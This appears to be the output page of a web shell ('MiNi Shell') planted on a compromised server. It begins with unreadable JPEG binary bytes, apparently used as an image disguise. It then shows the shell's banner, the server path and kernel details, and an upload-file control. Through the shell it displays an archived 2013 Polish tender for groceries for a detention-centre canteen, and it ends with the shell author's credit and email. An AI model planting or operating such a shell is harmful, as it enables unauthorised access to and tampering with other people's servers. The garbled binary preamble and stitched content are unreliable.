JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130604/213904-N-2013.html

<p class="kh_header"><b>Czerwony Bór: Dostawa PRZYPRAW, PRZETWORÓW WARZYWNO- OWOCOWYCH I RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH do kantyny prowadzonej przez Zamawiającego, mieszczącej się w Areszcie Śledczym w Suwałkach, ul. Wojska Polskiego 29 .</b><br>
<b>Numer ogłoszenia: 213904 - 2013; data zamieszczenia: 04.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaska Instytucja Gospodarki Budżetowej "BIELIK" , Czerwony Bór 23, 18-400 Czerwony Bór, woj. podlaskie, tel. 86 216 36 04, faks 86 216 31 49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbbielik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa PRZYPRAW, PRZETWORÓW WARZYWNO- OWOCOWYCH I RÓŻNYCH PRODUKTÓW SPOŻYWCZYCH do kantyny prowadzonej przez Zamawiającego, mieszczącej się w Areszcie Śledczym w Suwałkach, ul. Wojska Polskiego 29 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	Jedn. miary 	Ilość do 	Produkt równoważny 
( nazwa, gramatura ) 
1.		Sól 1 kg	szt.	500	X
2.		Sól 250g	szt.	200	X
3.		Majeranek 20g	szt.	100	X
4.		Kwasek cytrynowy 20g	szt.	200	X
5.		Soda oczyszczona 80g	szt.	200	X
6.		Papryka ostra mielona 20g	szt.	200	X
7.		Papryka słodka mielona 20g	szt.	200	X
8.		Pieprz naturalny mielony 20g	szt.	200	x
9.		Pieprz ziołowy mielony 20g	szt	200	X
10.		Zioła prowansalskie 10g	szt	200	X
11.		Czosnek granulowany 20g	szt	100	X
12.		Przyprawa oregano 10g	szt	100	X
13.		Przyprawa  gyross 20g	szt	200	X
14.		Żelatyna 20g	szt	200	X
15.		Przyprawa do zup 0,2l	szt	100	X
16.		Kostka rosołowa 60g-20g	op.	200	X
17.		Sos Knorr 25-30g	szt.	50	lub równoważne 
18.		Sos sałatkowy 9g Knorr	szt.	50	lub równoważne
19.		Cynamon mielony 20g	szt.	200	X
20.		Barszcz czerwony 0,200g	szt.	100	X
21.		Orzechy włoskie łuskane 80g	szt.	300	X
22.		Orzech laskowy łuskany	szt.	100	X
23.		Wiórki kokosowe 100g	szt.	200	X
24.		Migdały 80g	szt.	200	X
25.		Morele suszone 100g	szt.	100	X
26.		Śliwka suszona 100g	szt.	200	X
27.		Słonecznik łuskany 80g	szt.	300	X
28.		Rodzynki 100g	szt.	500	X
29.		Mieszanka bakaliowa 100g	szt.	300	X
30.		Przyprawa do zup Maggi 200g	szt.	100	lub równoważne
31.		Przyprawa Vegeta 200g	szt.	300	lub równoważne
32.		Przyprawa Warzywko 200g	szt.	300	lub równoważne
33.		Przyprawa Vegeta 75g	szt.	100	lub równoważne
34.		Miód 250g (naturalny)	szt.	300	x
35.		Cukier 1kg	kg	2000	X
36.		Cukier w saszetkach 5g (w opakowaniu 500g)	op.	40	X
37.		Cukier w kostkach 1kg.	szt.	100	X
38.		Słodzik (opakowanie 200szt.)	szt.	1000	X
39.		Śmietanka do kawy Cremona 200g	szt.	500	lub równoważne
40.		Śmietanka do kawy saszetki 4g (opakowanie 100szt)	op.	40	X
41.		Zupka błyskawiczna Vifon 70g	szt.	1000	lub równoważne
42.		Zupka błyskawiczna Knorr 60-70g	szt.	1000	lub równoważne
43.		Zupka błyskawiczna Amino 60-70g	szt.	1000	lub równoważne
44.		Zupka błyskawiczna KIM-LAN 70-75g	szt.	1000	lub równoważne
45.		Zupka gorący kubek 09-20g	szt.	3000	X
46.		Galaretka owocowa Gellwe 75g	szt.	2000	lub równoważne
47.		Galaretka owocowa Delecta 75g	szt.	2000	lub równoważne
48.		Kisiel słodka chwila 31,5-34g	szt.	1000	lub równoważne
49.		Budyń słodka-chwila 41-46g	szt.	1000	lub równoważne
50.		Kisiel Delacta 58g	szt.	200	lub równoważne
51.		Budyń Winiary 60g	szt.	200	lub równoważne
52.		Kaszka nestle mleczno-ryżowa 230g	szt.	100	lub równoważne
53.		Ketchup Hellmans 490g-plastik	szt.	500	lub równoważne
54.		Ketchup Kotlin 450g-plastik	szt.	500	lub równoważne
55.		Ketchup Pudliszki 480g-plastik	szt.	500	lub równoważne
56.		Ketchup Dawtona 500g-plastik	szt.	1000	lub równoważne
57.		Majonez kętrzyński 250g-butelka PET	szt.	500	lub równoważne
58.		Majonez napoleoński 260g	szt.	200	lub równoważne
59.		Musztarda 210g-plastik	szt.	500	X
60.		Musztarda 175g	szt.	200	X
61.		Musztarda 250g	szt.	100	X
62.		Sos słodko-kwaśny 350g Łowicz	szt.	100	lub równoważne
63.		Sos tatarski 260g	szt.	50	X
64.		Sos Develey 200g	szt.	100	lub równoważne
65.		Wafle ryżowe naturalne 100g	szt.	100	X
66.		Guma do żucia drażetki ORBIT 14g (nie mniej niż 10 drażetek w opakowaniu)	szt.	1000	lub równoważne
67.		Guma do żucia listki ORBIT 13g (nie mniej niż 5 listków w opakowaniu)	szt.	1000	lub równoważne
68.		Pieczywo chrupkie BAKE ROLLS 90g-różne smaki	szt.	100	lub równoważne
69.		Pieczywo chrupkie WASA 140g	szt.	100	lub równoważne
70.		Chipsy Lays 30g	szt.	500	lub równoważne
71.		Chipsy Lays 90g	szt.	1000	lub równoważne
72.		Chrzan tarty 290g	szt.	400	X
73.		Ćwikła z chrzanem 300g	szt.	200	X
74.		Dżem 280g Łowicz niskosłodzony, różne smaki 	szt.	600	lub równoważne
75.		Dżem Agrovita niskosłodzony, różne smaki	szt.	600	lub równoważne
76.		Ogórki konserwowe 0,9l	szt.	300	X
77.		Oliwki zielone drylowane 140g	szt.	100	X
78.		Pieczarki marynowane 290g - całe	szt.	200	
79.		Syrop owocowy Betex Lux 380ml - butelka plastik	szt.	500	lub równoważne
80.		Krem czekoladowy- opakowanie plastik 380g	szt.	300	X
81.		Krem czekoladowo-orzechowy Nutella 350g	szt.	200	lub równoważne
82.		Orzeszki solone 150g	szt.	2000	X
83.		Orzeszki fistaszki 150g	szt.	1000	X
84.		Orzeszki pistacje 100g	szt.	200	X
85.		Pasta kanapkowa Lisner 80g	szt.	100	lub równoważne
86.		Czosnek konserwowy 170ml	szt.	50	X
87.		Mieszanka obiadowa trzy warzywa Pudliszki 500g	szt.	200	lub równoważne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.87.00.00-7, 15.83.00.00-5, 15.89.31.00-5, 15.89.10.00-0, 15.89.32.00-6, 15.89.43.00-4, 15.89.50.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego
warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igbbielik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podlaska Instytucja Gospodarki Budżetowej Bielik z siedzibą w Czerwonym Borze, Czerwony Bór 23, 18-400 Łomża, tel. 86 215-35-95.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2013 godzina 10:00, miejsce: Podlaska Instytucja Gospodarki Budżetowej Bielik z siedzibą w Czerwonym Borze, Czerwony Bór 23, 18-400 Łomża, tel. 86 215-35-95.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com